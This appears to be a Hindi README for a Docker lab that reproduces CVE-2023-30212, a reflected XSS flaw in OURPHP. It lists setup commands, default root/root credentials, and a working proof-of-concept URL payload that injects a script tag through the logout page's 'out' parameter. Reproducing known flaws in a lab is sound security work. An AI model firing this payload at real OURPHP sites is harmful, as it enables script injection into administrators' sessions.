
यह OURPHP में एक XSS भेद्यता (CVE-2023-30212) को दोहराने के लिए आवश्यक फ़ाइलें और Docker शामिल करता है।
इसमें OURPHP में एक XSS कमजोरी (CVE-2023-30212) को दोहराने के लिए आवश्यक निर्देशिकाएँ और Dockerfile शामिल हैं।
पूर्व-आवश्यकताएँ
Docker डाउनलोड करें
sudo apt install -y docker.io
इस रिपॉजिटरी से फ़ाइलों को git clone का उपयोग करके डाउनलोड करें
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
इसमें परिदृश्य को दोहराने के लिए आवश्यक निर्देशिकाएँ और dockerfile शामिल हैं।
फ़ाइलें डाउनलोड करने के बाद, निम्न कमांड का उपयोग करके एक Docker इमेज बनाएं
sudo docker build -t <Give_Suitable_Docker_name> . .
! Docker इमेज को एक नाम दें ताकि बाद में इसे कॉल किया जा सके।
Docker इमेज को कंटेनर में बदलने के लिए निम्न का उपयोग करें
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! यहाँ कंटेनर पोर्ट को पोर्ट 80 से मैप किया गया है।
Docker कंटेनर की स्थिति देखने के लिए,
sudo docker ps
ये चरण करने के बाद,
localhost दर्ज करें और निम्न क्रेडेंशियल्स के साथ OURPHP कॉन्फ़िगर करें। उपयोगकर्ता नाम : root पासवर्ड : root डेटाबेस नाम: data
अब आपको प्रशासनिक के लिए उपयोगकर्ता नाम और पासवर्ड कॉन्फ़िगर करना होगा। निम्न सेट करें: उपयोगकर्ता नाम: root पासवर्ड: root और आगे बढ़ें
तो हमारा पेलोड है
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
XSS ट्रिगर करने के लिए इसे localhost या 127.0.0.1 के साथ जोड़ें।